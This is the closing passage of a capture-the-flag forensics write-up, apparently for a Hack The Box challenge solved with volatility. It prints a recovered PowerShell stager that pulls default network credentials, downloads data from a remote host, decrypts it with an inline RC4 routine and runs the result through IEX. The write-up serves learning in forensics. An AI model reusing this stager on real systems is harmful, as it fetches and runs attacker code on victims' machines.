[SYSTeM.NET.CreDEnTiaLCaChe]::DeFauLTNEtwOrkCredentiAlS;$K=[SYStEM.Text.ENCODIng]::ASCII.GEtBytEs('E1gMGdfT@eoN>x9{]2F7+bsOn4/SiQrw');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$wc.HEAdErs.ADD("Cookie","session=MCahuQVfz0yM6VBe8fzV9t9jomo=");$ser='http://10.10.99.55:80';$t='/login/process.php';$flag='HTB{$_j0G_********0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX
We get the flag!
This was rather a very simple forensics challenge but I enjoyed it a lot. If you’re new to using forensics tool like volatility, this is a simple challenge to get oneself accustomed to it.